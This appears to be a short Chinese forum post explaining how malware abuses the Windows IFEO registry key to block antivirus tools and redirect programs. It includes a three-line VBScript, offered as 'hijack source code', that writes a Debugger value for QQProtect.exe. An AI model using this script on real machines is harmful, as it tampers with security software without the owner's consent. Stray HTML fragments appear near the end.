什么是映像劫持
如果你明明双击执行了程序A,但运行起来的却是程序B(比如,明明运行qq,但QQ没起来,反而跳出个Foxmail),那么恭喜你,你应该中了某类采用了IFEO技术的病毒了。
所谓IFEO,其实是Image File Execution Option的缩写,其实就是个注册表项:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
近期被很多病毒都利用该技术来:
a.阻止杀毒软件和专杀工具的运行;
b.重定向一些常用程序到病毒体,一旦运行这些程序,病毒再度死灰复燃
镜像劫持相信大家都不陌生,以前有个叫“AV终结者”利用IFEO镜像劫持技术搞垮了安全软件.
Dim a
Set a = CreateObject("wscript.shell")
a.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QQProtect.exe\Debugger", "", "REG_SZ"
500){this.width = 500;}"> 
500){this.width = 500;}">
本人表达能力很差不好意思哦,这里我公布一下劫持的源代码,千万不要拿去淫荡。
